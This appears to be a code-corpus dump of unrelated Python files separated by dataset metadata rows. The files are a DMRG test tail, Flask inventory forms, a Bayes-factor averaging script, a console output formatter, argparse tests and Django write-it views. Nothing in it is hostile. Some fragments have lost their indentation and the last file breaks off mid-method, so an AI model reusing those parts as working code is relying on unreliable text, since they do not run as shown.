###############################################################################################
for orb1 in range( L ):
for orb2 in range( L ):
eri = g * ( abs( eps[ orb1 ] * eps[ orb2 ] )**power )
oei = ( eps[ orb1 ] + eps[ orb2 ] ) / ( Nelec - 1 )
if ( orb1 == orb2 ):
Prob.setMxElement( orb1, orb1, orb2, orb2, eri + oei )
else:
Prob.setMxElement( orb1, orb1, orb2, orb2, eri )
Prob.setMxElement( orb1, orb2, orb1, orb2, oei )
theDMRG.PreSolve() # New matrix elements require reconstruction of complementary renormalized operators
Energy = theDMRG.Solve()
theDMRG.calc2DMandCorrelations()
theDMRG.printCorrelations()
# Clean-up
# theDMRG.deleteStoredMPS()
theDMRG.deleteStoredOperators()
del theDMRG
del OptScheme
del Prob
del Ham
del Initializer
# Check whether the test succeeded
if ( np.fabs( Energy + 25.5134137600604 ) < 1e-8 ):
print("================> Did test 12 succeed : yes")
else:
print("================> Did test 12 succeed : no")
| gpl-2.0 | -2,050,985,702,913,222,700 | 35.427083 | 103 | 0.635402 | false | 3.070237 | false | false | false |
jinjiaho/project57 | forms.py | 1 | 3372 | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, SubmitField, RadioField, validators, IntegerField, SelectField, BooleanField,DecimalField
from wtforms.validators import DataRequired, Email, Length
from flaskext.mysql import MySQL
class AddUserForm(FlaskForm):
name = StringField('Full Name', validators=[DataRequired("Please enter the name of the newcomer.")])
username= StringField('Username', validators=[DataRequired("Please enter a username.")])
role = RadioField('Role of User')
password = PasswordField('Password', validators=[DataRequired("Please enter a password."), Length(min=6, message="Passwords must be 6 characters or more.")])
submit = SubmitField('Add User')
class CreateNewItem(FlaskForm):
itemname = StringField('Item Name', validators=[DataRequired("Please enter the name of the new item.")])
category = StringField('Category of Item', validators = [DataRequired()])
price = DecimalField('Unit Price', places=4, rounding=None, validators = [DataRequired()])
reorderpt = IntegerField('Reorder Point', validators = [DataRequired()])
count_unit = SelectField('Unit for Withdrawal', validators = [DataRequired()], choices=[("carton", "carton"), ("pc", "pc"), ("kg", "kg"), ("tin", "tin"), ("box", "box"), ("unit", "unit"), ("packet", "packet")])
order_unit = SelectField('Unit for Receiving', validators = [DataRequired()], choices=[("carton", "carton"), ("pc", "pc"), ("kg", "kg"), ("tin", "tin"), ("box", "box"), ("unit", "unit")])
order_multiplier = DecimalField('Item Quantity', places=4, rounding=None, validators = [DataRequired()])
submitTwo = SubmitField('Add New Item')
class ExistingItemsLocation(FlaskForm):
itemname = StringField('Item Name', validators=[DataRequired("Please insert the name of the item")])
tid = SelectField('Tag', coerce=int) # Value is tid
qty = IntegerField('Available Amount', validators = [DataRequired()])
submitFour = SubmitField('Assign To Tag')
class TransferItem(FlaskForm):
iname = StringField('Item Name')
tagOld = SelectField('Old Tag', coerce=int) # Value is tid
tagNew = SelectField('New Tag', coerce=int) # Value is tid
qty = IntegerField('Qty to Transfer', [validators.Optional()])
submit = SubmitField()
class LoginForm(FlaskForm):
username = StringField(validators=[DataRequired("Please enter a username")])
password = PasswordField(validators=[DataRequired('Please enter a password')])
remember = BooleanField()
submit = SubmitField()
class RetrievalForm(FlaskForm):
amount = StringField('Input the Amount Taken', validators=[validators.input_required()])
submit4 = SubmitField("Enter Quantity")
class AddNewLocation(FlaskForm):
tname = StringField('Name of New Tag', validators=[DataRequired("Please enter the name of the tag without spaces.")])
location = SelectField('Select Storeroom')
newLocation = StringField('Add a New Storeroom')
remarks = StringField('Remarks (optional)')
submitThree = SubmitField("Enter")
class TrackingForm(FlaskForm):
enabled = RadioField('Track Item Quantity? ', choices=[('yes','Yes'),('no','No')])
password = PasswordField(validators=[DataRequired('Please enter a password')])
remember = BooleanField()
submit = SubmitField()
class RemoveItem(FlaskForm):
iname = StringField('Item Name')
submit = SubmitField("Delete Item")
| mit | 4,052,969,891,147,546,600 | 49.328358 | 211 | 0.733393 | false | 3.844926 | false | false | false |
kristohr/pybayenv2 | pybayenv/compute_average_bf.py | 1 | 4066 | #!/usr/bin/python
import sys, string, re, os, commands, time, math
#from scipy import stats
#import scipy as sp
import numpy as np
#import matplotlib as mpl
#from matplotlib import pyplot as plt
class SNP:
def __init__(self, name, num_env, t):
self.name = name
self.num_env = [False] * num_env
self.bf_list = [[0 for i in range(t)] for j in range(num_env)]
self.rel_signal = []
self.sum_signals = 0
self.lg_info = []
self.chr = 99
self.lg = 99
def get_name(self):
return self.name
def get_num_env(self):
return self.num_env
def set_num_env(self, n):
self.num_env[n] = True
def add_to_list(self, bf, k, i):
self.bf_list[k][i] = bf
def set_signal(self, gamma):
self.rel_signal.append(gamma)
self.sum_signals += gamma #Add to the total of signals
#Return the bf signal in variable k
def get_signal(self, k):
return self.rel_signal[k]
#Return the bf signal list
def get_signals(self):
return self.rel_signal
def get_sum_signals(self):
return self.sum_signals
def print_env(self):
print self.num_env
def get_median_bf(self, k):
#print self.bf_list[k]
bfs = np.array(self.bf_list[k])
median = np.median(bfs)
return median
def get_avg_bf(self, k):
#print self.bf_list[k]
bfs = np.array(self.bf_list[k])
avg = np.average(bfs)
return avg
def add_bf(self, bf):
self.sum_bf += bf
def get_sum_bf(self):
return self.sum_bf
def get_num_runs(self):
return self.num_runs
def get_bf_list(self):
return self.bf_list
def set_lg_info(self, info):
self.lg_info.append(info)
def get_lg_info(self):
return self.lg_info
def set_chr(self, ch):
self.chr = ch
def get_chr(self):
return self.chr
def set_linkage_group(self, lg):
self.lg = lg
def get_linkage_group(self):
return self.lg
def compute_average_bf(num_var, num_tests):
N = int(num_var)
t = int(num_tests)
snp_dict = {}
for i in range (0, t):
filename = "results/bf_results_t" + str(i) + ".bf"
data = open( filename, "r")
print filename
lines = data.readlines()
for line in lines:
cols = line.split("\t")
snp_name = cols[0][0:-2]
if i > 9:
snp_name = snp_name[0:-1]
if snp_name in snp_dict:
snp = snp_dict[snp_name]
for k in range(0, N):
snp.add_to_list(float(cols[k+1]), k, i)
else:
snp = SNP(snp_name, N, t)
snp_dict[snp_name] = snp
for k in range(0, N):
snp.add_to_list(float(cols[k+1]), k, i)
data.close()
print "################LENGTH:" + str(len(snp_dict))
FILE1 = open("results/median_bf.txt", "w")
FILE2 = open("results/average_bf.txt", "w")
#bf_median = "marker\tsal1\tsal2\ttemp1\ttemp2\tox1\tox2\n"
#bf_avg = "marker\tsal1\tsal2\ttemp1\ttemp2\tox1\tox2\n"
bf_median = ""
bf_avg = ""
for key in snp_dict:
snp = snp_dict[key]
bf_avg += snp.get_name()
bf_median += snp.get_name()
for k in range(0, N):
bf_a = snp.get_avg_bf(k)
bf_m = snp.get_median_bf(k)
bf_avg += "\t" + str(bf_a)
bf_median += "\t" + str(bf_m)
bf_avg += "\n"
bf_median += "\n"
FILE1.write(bf_median)
FILE2.write(bf_avg)
FILE1.close()
FILE2.close()
if __name__ == '__main__':
# Terminate if too few arguments
if len(sys.argv) < 3:
print 'usage: %s <number of vars> <num tests>' % sys.argv[0]
sys.exit(-1)
    compute_average_bf(sys.argv[1], sys.argv[2])
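# Example invocation (the results/bf_results_t<i>.bf layout is assumed by the code above):
#   python compute_average_bf.py 6 20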
| bsd-3-clause | 8,263,703,149,634,889,000 | 23.792683 | 70 | 0.512789 | false | 3.118098 | false | false | false |
thenakliman/nirikshak | nirikshak/post_task/console.py | 1 | 2103 | # Copyright 2017 <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from nirikshak.common import plugins
from nirikshak.post_task import base
LOG = logging.getLogger(__name__)
@plugins.register('console')
class FormatOutputConsole(base.FormatOutput):
@staticmethod
def _get_jaanch_result(jaanch_parameter):
if 'result' in jaanch_parameter['output']:
if str(jaanch_parameter['output']['result']) == \
str(jaanch_parameter['input']['result']):
return 'pass'
return 'fail'
return jaanch_parameter['input']['result']
def format_output(self, **kwargs):
jaanch_name = list(kwargs.keys())[0]
jaanch_parameter = kwargs[jaanch_name]
input_parameter = ''
for key, value in jaanch_parameter['input']['args'].items():
input_parameter = ("%s%s:%s," % (input_parameter, key, value))
jaanch_result = self._get_jaanch_result(jaanch_parameter)
jaanch_type = jaanch_parameter['type']
jaanch_name_type_param = ("%s,%s,%s" % (jaanch_name,
jaanch_type,
input_parameter))
separator = '.' * (120 - len(jaanch_name_type_param))
formatted_output = ("%s%s%s" % (jaanch_name_type_param, separator,
jaanch_result))
jaanch_parameter['formatted_output'] = formatted_output
LOG.info("%s output has been formatted for console", formatted_output)
return kwargs
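# Illustrative input/output (dict layout inferred from the code above, not from nirikshak docs):
#
#   kwargs = {"disk_check": {"type": "shell",
#                            "input": {"args": {"path": "/"}, "result": 0},
#                            "output": {"result": 0}}}
#   FormatOutputConsole().format_output(**kwargs)
#   # kwargs["disk_check"]["formatted_output"] now ends with "...pass"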
| apache-2.0 | 6,413,825,219,913,676,000 | 39.442308 | 78 | 0.622444 | false | 3.809783 | false | false | false |
matematik7/STM | tests/test_parser.py | 1 | 6119 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------
# tests/test_parser.py
#
# Test input arguments parser
# ----------------------------------------------------------------
# copyright (c) 2015 - Domen Ipavec
# Distributed under The MIT License, see LICENSE
# ----------------------------------------------------------------
from unittest import TestCase
import argparse, sys
from stm.configuration import Configuration
from stm.parser import Parser
# change argument parser to print to stdout
class ArgumentParser(argparse.ArgumentParser):
def error(self, message):
self.print_help(sys.stdout)
print('%s: error: %s\n' % (self.prog, message))
exit()
class Test_parser(TestCase):
def setUp(self):
self.parser = Parser()
def tearDown(self):
self.parser = None
def getConf(self, arguments):
return self.parser.getConfiguration(arguments.split(), ArgumentParser)
def assertInvalid(self, input):
with self.assertRaises(SystemExit):
self.getConf(input)
def test_empty(self):
self.assertInvalid('')
def test_direct(self):
conf = self.getConf('--input test.png test2.png --prefix pref --postfix post --folder fol')
self.assertItemsEqual(conf.input, ['test.png', 'test2.png'])
self.assertEqual(conf.name_prefix, 'pref')
self.assertEqual(conf.name_postfix, 'post')
self.assertEqual(conf.folder, 'fol')
def test_output(self):
self.assertInvalid('--input test.png test2.png --output test.png')
self.assertInvalid('--input . --output test.png')
conf = self.getConf('--input test.png --output test.png')
self.assertEqual(conf.output, 'test.png')
def test_recursive(self):
conf = self.getConf('--input test.png --recursive')
self.assertTrue(conf.recursive)
conf = self.getConf('--input test.png')
self.assertFalse(conf.recursive)
def test_debug(self):
conf = self.getConf('--input test.png --debug')
self.assertTrue(conf.debug)
conf = self.getConf('--input test.png')
self.assertFalse(conf.debug)
def test_verbose(self):
conf = self.getConf('--input test.png --verbose')
self.assertTrue(conf.verbose)
conf = self.getConf('--input test.png')
self.assertFalse(conf.verbose)
def test_file_format(self):
conf = self.getConf('--input test.png --fileFormat jpg')
self.assertEqual(conf.fileFormat, 'jpg')
self.assertInvalid('--input test.png --fileFormat krn')
def test_size(self):
conf = self.getConf('--input test.png --size 123x456')
self.assertEqual(conf.size, [123, 456])
self.assertInvalid('--input test.png --size 0x2')
self.assertInvalid('--input test.png --size -12x2')
self.assertInvalid('--input test.png --size 123')
self.assertInvalid('--input test.png --size 12x12x12')
self.assertInvalid('--input test.png --size xxx')
def test_mode(self):
conf = self.getConf('--input test.png --scale')
self.assertEqual(conf.cropMode, 'none')
conf = self.getConf('--input test.png --padd')
self.assertEqual(conf.cropMode, 'padd')
conf = self.getConf('--input test.png --crop')
self.assertEqual(conf.cropMode, 'crop')
conf = self.getConf('--input test.png --smart')
self.assertEqual(conf.cropMode, 'smart')
conf = self.getConf('--input test.png')
self.assertEqual(conf.cropMode, 'smart')
self.assertInvalid('--input test.png --scale --padd')
self.assertInvalid('--input test.png --padd --crop')
self.assertInvalid('--input test.png --crop --featured a')
self.assertInvalid('--input test.png --featured a --smart')
self.assertInvalid('--input test.png --smart --scale')
def test_mode_featured(self):
conf = self.getConf('--input test.png --featured 100x30,-15x30')
self.assertEqual(conf.featured, ([100,30], [-15, 30]))
self.assertInvalid('--input test.png --featured xxx,xxx')
self.assertInvalid('--input test.png --featured 10x10x10,15x30')
self.assertInvalid('--input test.png --featured 10x10,10x10,10x10')
self.assertInvalid('--input test.png --featured 10x10')
self.assertInvalid('--input test.png --featured 10,10x10')
def test_padd_color(self):
conf = self.getConf('--input test.png --padd --paddColor 0,100,200,250')
self.assertEqual(conf.paddColor, [0,100,200,250])
conf = self.getConf('--input test.png --paddColor 0,100,200')
self.assertEqual(conf.paddColor, [0,100,200,255])
self.assertInvalid('--input test.png --padd --paddColor 0')
self.assertInvalid('--input test.png --padd --paddColor 0,100')
self.assertInvalid('--input test.png --padd --paddColor 0,100,100,100,100')
self.assertInvalid('--input test.png --padd --paddColor -1,100,100')
self.assertInvalid('--input test.png --padd --paddColor 256,100,100')
def test_zoominess(self):
conf = self.getConf('--input test.png --zoominess 10')
self.assertEqual(conf.zoominess, 10)
conf = self.getConf('--input test.png --zoominess 0')
self.assertEqual(conf.zoominess, 0)
self.assertInvalid('--input test.png --zoominess 101')
self.assertInvalid('--input test.png --zoominess -1')
self.assertInvalid('--input test.png --zoominess 45 --padd')
self.assertInvalid('--input test.png --zoominess 45 --crop')
self.assertInvalid('--input test.png --zoominess 45 --scale')
def test_allowPadd(self):
conf = self.getConf('--input test.png --allowPadd')
self.assertTrue(conf.allowPadd)
conf = self.getConf('--input test.png')
self.assertFalse(conf.allowPadd)
| mit | -2,415,367,671,543,004,000 | 37.484277 | 99 | 0.594868 | false | 3.919923 | true | false | false |
ciudadanointeligente/write-it | nuntium/user_section/views.py | 1 | 24845 | import requests
from django.contrib.auth.decorators import login_required
from subdomains.utils import reverse
from django.http import HttpResponse, Http404
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import TemplateView, CreateView, DetailView, View, ListView, RedirectView
from django.views.generic.edit import UpdateView, DeleteView, FormView
from mailit.forms import MailitTemplateForm
from instance.models import WriteItInstance, WriteItInstanceConfig, WriteitInstancePopitInstanceRecord
from ..models import Message,\
NewAnswerNotificationTemplate, ConfirmationTemplate, \
Answer, Moderation, \
AnswerWebHook
from .forms import WriteItInstanceBasicForm, \
NewAnswerNotificationTemplateForm, ConfirmationTemplateForm, \
WriteItInstanceAnswerNotificationForm, \
WriteItInstanceApiAutoconfirmForm, \
WriteItInstanceCreateForm, \
WriteItInstanceModerationForm, \
WriteItInstanceMaxRecipientsForm, \
WriteItInstanceRateLimiterForm, \
WriteItInstanceWebBasedForm, \
AnswerForm, RelatePopitInstanceWithWriteItInstance, \
WebhookCreateForm
from django.contrib import messages as view_messages
from django.utils.translation import ugettext as _
import json
from nuntium.popit_api_instance import PopitApiInstance
from nuntium.tasks import pull_from_popit
from nuntium.user_section.forms import WriteItPopitUpdateForm
from django.contrib.sites.models import Site
class UserAccountView(TemplateView):
template_name = 'nuntium/profiles/your-profile.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserAccountView, self).dispatch(*args, **kwargs)
class WriteItInstanceDetailBaseView(DetailView):
model = WriteItInstance
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(DetailView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.object = super(DetailView, self).get_object(queryset=queryset)
#OK I don't know if it is better to test by id
if not self.object.owner.__eq__(self.request.user):
raise Http404
return self.object
class WriteItInstanceContactDetailView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/profiles/contacts/contacts-per-writeitinstance.html'
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceContactDetailView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceContactDetailView, self).get_context_data(**kwargs)
context['people'] = self.object.persons.order_by('name')
return context
class WriteItInstanceStatusView(WriteItInstanceDetailBaseView):
def render_to_response(self, context, **response_kwargs):
status = self.object.pulling_from_popit_status
return HttpResponse(
json.dumps(status),
content_type='application/json',
**response_kwargs
)
class WriteItInstanceApiDocsView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/writeitinstance_api_docs.html'
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceApiDocsView, self).get_context_data(*args, **kwargs)
current_domain = Site.objects.get_current().domain
context['api_base_url'] = 'http://' + current_domain + '/api/v1/'
return context
class WriteItInstanceTemplateUpdateView(DetailView):
model = WriteItInstance
template_name = 'nuntium/profiles/templates.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceTemplateUpdateView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.object = super(WriteItInstanceTemplateUpdateView, self).get_object(queryset=queryset)
#OK I don't know if it is better to test by id
if not self.object.owner.__eq__(self.request.user):
raise Http404
return self.object
def get_context_data(self, **kwargs):
context = super(WriteItInstanceTemplateUpdateView, self).get_context_data(**kwargs)
context['new_answer_template_form'] = NewAnswerNotificationTemplateForm(
writeitinstance=self.object,
instance=self.object.new_answer_notification_template,
)
context['mailit_template_form'] = MailitTemplateForm(
writeitinstance=self.object,
instance=self.object.mailit_template,
)
context['confirmation_template_form'] = ConfirmationTemplateForm(
writeitinstance=self.object,
instance=self.object.confirmationtemplate,
)
return context
class WriteItInstanceUpdateView(UpdateView):
form_class = WriteItInstanceBasicForm
template_name = "nuntium/writeitinstance_update_form.html"
model = WriteItInstance
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceUpdateView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
queryset = super(WriteItInstanceUpdateView, self).get_queryset().filter(owner=self.request.user)
return queryset
def get_success_url(self):
return reverse(
'writeitinstance_basic_update',
subdomain=self.object.slug,
)
class WriteItInstanceAdvancedUpdateView(UpdateView):
model = WriteItInstanceConfig
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceAdvancedUpdateView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return super(WriteItInstanceAdvancedUpdateView, self).get_queryset().filter(writeitinstance__owner=self.request.user)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceAdvancedUpdateView, self).get_context_data(**kwargs)
context['writeitinstance'] = self.object.writeitinstance
return context
def get_slug_field(self):
return 'writeitinstance__slug'
class WriteItInstanceAnswerNotificationView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceAnswerNotificationForm
template_name = 'nuntium/writeitinstance_answernotification_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_answernotification_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceRateLimiterView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceRateLimiterForm
template_name = 'nuntium/writeitinstance_ratelimiter_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_ratelimiter_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceModerationView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceModerationForm
template_name = 'nuntium/writeitinstance_moderation_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_moderation_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceApiAutoconfirmView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceApiAutoconfirmForm
template_name = 'nuntium/writeitinstance_autoconfirm_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_api_autoconfirm_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceMaxRecipientsView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceMaxRecipientsForm
template_name = 'nuntium/writeitinstance_max_recipients_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_maxrecipients_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceWebBasedView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceWebBasedForm
template_name = 'nuntium/writeitinstance_web_based_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_webbased_update',
subdomain=self.object.writeitinstance.slug
)
class UserSectionListView(ListView):
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserSectionListView, self).dispatch(*args, **kwargs)
def get_queryset(self):
queryset = super(UserSectionListView, self).get_queryset().filter(owner=self.request.user)
return queryset
class WriteItInstanceCreateView(CreateView):
model = WriteItInstance
form_class = WriteItInstanceCreateForm
template_name = 'nuntium/create_new_writeitinstance.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(WriteItInstanceCreateView, self).dispatch(*args, **kwargs)
def get_success_url(self):
return reverse(
'welcome',
subdomain=self.object.slug
)
def get_form_kwargs(self):
kwargs = super(WriteItInstanceCreateView, self).get_form_kwargs()
kwargs['owner'] = self.request.user
if 'data' in kwargs and kwargs['data'].get('legislature'):
kwargs['data'] = kwargs['data'].copy()
kwargs['data']['popit_url'] = kwargs['data']['legislature']
return kwargs
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceCreateView, self).get_context_data(*args, **kwargs)
countries_json_url = ('http://everypolitician.github.io/'
'everypolitician-writeinpublic/countries.json')
context['countries'] = requests.get(countries_json_url).json()
return context
class YourInstancesView(UserSectionListView):
model = WriteItInstance
template_name = 'nuntium/profiles/your-instances.html'
def get_context_data(self, **kwargs):
kwargs = super(YourInstancesView, self).get_context_data(**kwargs)
kwargs['new_instance_form'] = WriteItInstanceCreateForm()
kwargs['live_sites'] = kwargs['object_list'].filter(config__testing_mode=False)
kwargs['test_sites'] = kwargs['object_list'].filter(config__testing_mode=True)
return kwargs
class LoginRequiredMixin(View):
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(LoginRequiredMixin, self).dispatch(*args, **kwargs)
class WriteItInstanceOwnerMixin(LoginRequiredMixin):
def get_object(self):
slug = self.request.subdomain
pk = self.kwargs.get('pk')
return get_object_or_404(self.model, writeitinstance__slug=slug, writeitinstance__owner=self.request.user, pk=pk)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceOwnerMixin, self).get_context_data(**kwargs)
context['writeitinstance'] = self.object.writeitinstance
return context
# Note that there is no need for subclasses of this to also subclass WriteItInstanceOwnerMixin
# as it does its own owner checking.
class UpdateTemplateWithWriteitBase(LoginRequiredMixin, UpdateView):
def get_object(self):
return get_object_or_404(self.model, writeitinstance__slug=self.request.subdomain, writeitinstance__owner=self.request.user)
def get_form_kwargs(self):
kwargs = super(UpdateTemplateWithWriteitBase, self).get_form_kwargs()
kwargs['writeitinstance'] = self.object.writeitinstance
return kwargs
def get_success_url(self):
return reverse(
'writeitinstance_template_update',
subdomain=self.object.writeitinstance.slug,
)
class NewAnswerNotificationTemplateUpdateView(UpdateTemplateWithWriteitBase):
form_class = NewAnswerNotificationTemplateForm
model = NewAnswerNotificationTemplate
class ConfirmationTemplateUpdateView(UpdateTemplateWithWriteitBase):
form_class = ConfirmationTemplateForm
model = ConfirmationTemplate
class MessagesPerWriteItInstance(LoginRequiredMixin, ListView):
model = Message
template_name = 'nuntium/profiles/messages_per_instance.html'
def get_queryset(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
return super(MessagesPerWriteItInstance, self).get_queryset().filter(writeitinstance=self.writeitinstance)
def get_context_data(self, **kwargs):
context = super(MessagesPerWriteItInstance, self).get_context_data(**kwargs)
context['writeitinstance'] = self.writeitinstance
return context
class MessageDetail(WriteItInstanceOwnerMixin, DetailView):
model = Message
template_name = "nuntium/profiles/message_detail.html"
class AnswerEditMixin(View):
def get_message(self):
raise NotImplementedError
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
self.message = self.get_message()
if self.message.writeitinstance.owner != self.request.user:
raise Http404
return super(AnswerEditMixin, self).dispatch(*args, **kwargs)
def get_success_url(self):
return reverse(
'message_detail_private',
subdomain=self.message.writeitinstance.slug,
kwargs={'pk': self.message.pk},
)
class AnswerCreateView(AnswerEditMixin, CreateView):
model = Answer
template_name = "nuntium/profiles/create_answer.html"
form_class = AnswerForm
def get_message(self):
message = Message.objects.get(id=self.kwargs['pk'])
return message
def get_form_kwargs(self):
kwargs = super(AnswerCreateView, self).get_form_kwargs()
kwargs['message'] = self.message
return kwargs
class AnswerUpdateView(AnswerEditMixin, UpdateView):
model = Answer
template_name = "nuntium/profiles/update_answer.html"
fields = ['content']
def get_message(self):
return self.model.objects.get(id=self.kwargs['pk']).message
class AcceptMessageView(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(AcceptMessageView, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user
)
message.moderate()
view_messages.info(self.request, _('The message "%(message)s" has been accepted') % {'message': message})
return reverse(
'messages_per_writeitinstance',
subdomain=message.writeitinstance.slug,
)
class RejectMessageView(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(RejectMessageView, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user
)
message.public = False
message.moderated = True
message.save()
view_messages.info(self.request, _('The message "%(message)s" has been rejected') % {'message': message})
return reverse(
'messages_per_writeitinstance',
subdomain=message.writeitinstance.slug,
)
class ModerationView(DetailView):
model = Moderation
slug_field = 'key'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ModerationView, self).dispatch(*args, **kwargs)
def get_queryset(self):
queryset = super(ModerationView, self).get_queryset()
        queryset = queryset.filter(
message__writeitinstance__owner=self.request.user,
message__writeitinstance__slug=self.request.subdomain,
)
return queryset
class AcceptModerationView(ModerationView):
template_name = "nuntium/moderation_accepted.html"
def get(self, *args, **kwargs):
moderation = self.get_object()
moderation.message.moderate()
return super(AcceptModerationView, self).get(*args, **kwargs)
class RejectModerationView(ModerationView):
template_name = "nuntium/moderation_rejected.html"
def get(self, *args, **kwargs):
get = super(RejectModerationView, self).get(*args, **kwargs)
self.object.message.public = False
# It is turned True to avoid users to
# mistakenly moderate this message
# in the admin section
self.object.message.moderated = True
self.object.message.save()
return get
class WriteitPopitRelatingView(FormView):
form_class = RelatePopitInstanceWithWriteItInstance
template_name = 'nuntium/profiles/writeitinstance_and_popit_relations.html'
# This method also checks for instance ownership
def get_writeitinstance(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
def dispatch(self, *args, **kwargs):
self.get_writeitinstance()
return super(WriteitPopitRelatingView, self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(WriteitPopitRelatingView, self).get_form_kwargs()
kwargs['writeitinstance'] = self.writeitinstance
return kwargs
def get_success_url(self):
return reverse('relate-writeit-popit', subdomain=self.writeitinstance.slug)
def form_valid(self, form):
form.relate()
# It returns an AsyncResult http://celery.readthedocs.org/en/latest/reference/celery.result.html
# that we could use for future information about this process
return super(WriteitPopitRelatingView, self).form_valid(form)
def get_context_data(self, **kwargs):
context = super(WriteitPopitRelatingView, self).get_context_data(**kwargs)
context['writeitinstance'] = self.writeitinstance
context['relations'] = self.writeitinstance.writeitinstancepopitinstancerecord_set.all()
return context
class ReSyncFromPopit(View):
def dispatch(self, *args, **kwargs):
if not self.request.user.is_authenticated():
raise Http404
return super(ReSyncFromPopit, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
writeitinstance = get_object_or_404(WriteItInstance,
slug=self.request.subdomain,
owner=self.request.user)
popits_previously_related = PopitApiInstance.objects.filter(
writeitinstancepopitinstancerecord__writeitinstance=writeitinstance)
popit_api_instance = get_object_or_404(popits_previously_related, pk=kwargs['popit_api_pk'])
pull_from_popit.delay(writeitinstance, popit_api_instance)
return HttpResponse()
class WriteItPopitUpdateView(UpdateView):
form_class = WriteItPopitUpdateForm
model = WriteitInstancePopitInstanceRecord
def get_writeitinstance(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
def dispatch(self, *args, **kwargs):
self.get_writeitinstance()
if self.request.method != 'POST':
return self.http_method_not_allowed(*args, **kwargs)
return super(WriteItPopitUpdateView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
form.save()
return HttpResponse(
json.dumps({
'id': form.instance.id,
'periodicity': form.instance.periodicity
}),
content_type='application/json'
)
def form_invalid(self, form):
super(WriteItPopitUpdateView, self).form_invalid(form)
return HttpResponse(
json.dumps({
'errors': form.errors
}),
content_type='application/json'
)
class WriteItDeleteView(DeleteView):
model = WriteItInstance
# @method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItDeleteView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
obj = super(WriteItDeleteView, self).get_object(queryset=queryset)
if not obj.owner == self.request.user:
raise Http404
return obj
def get_success_url(self):
url = reverse('your-instances')
return url
class MessageTogglePublic(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(MessageTogglePublic, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user,
)
message.public = not message.public
message.save()
if message.public:
view_messages.info(self.request, _("This message has been marked as public"))
else:
view_messages.info(self.request, _("This message has been marked as private"))
